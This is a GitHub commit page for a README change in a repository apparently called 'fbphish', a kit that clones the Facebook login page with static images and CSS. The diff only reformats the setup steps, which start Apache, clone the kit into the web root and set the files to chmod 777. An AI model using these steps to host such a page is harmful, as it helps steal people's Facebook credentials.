Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
0xyg3n authored Jul 29, 2018
1 parent f7ca282 commit 6146591
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,9 +8,9 @@ which also means that every image and css code is loaded dynamically and randoml
I just collected all the images and the css code and i made them static to the code so it doesn't also require to send any requests to facebook.com.

## Usage
1. service apache2 start
2. git clone https://github.com/0xyg3n/fbphish /var/www/html
3. chmod 777 /var/www/html/*
1. `sudo service apache2 start`
2. `git clone https://github.com/0xyg3n/fbphish /var/www/html`
3. `sudo chmod 777 /var/www/html/* `


##Troubleshooting
Expand Down

0 comments on commit 6146591

Please sign in to comment.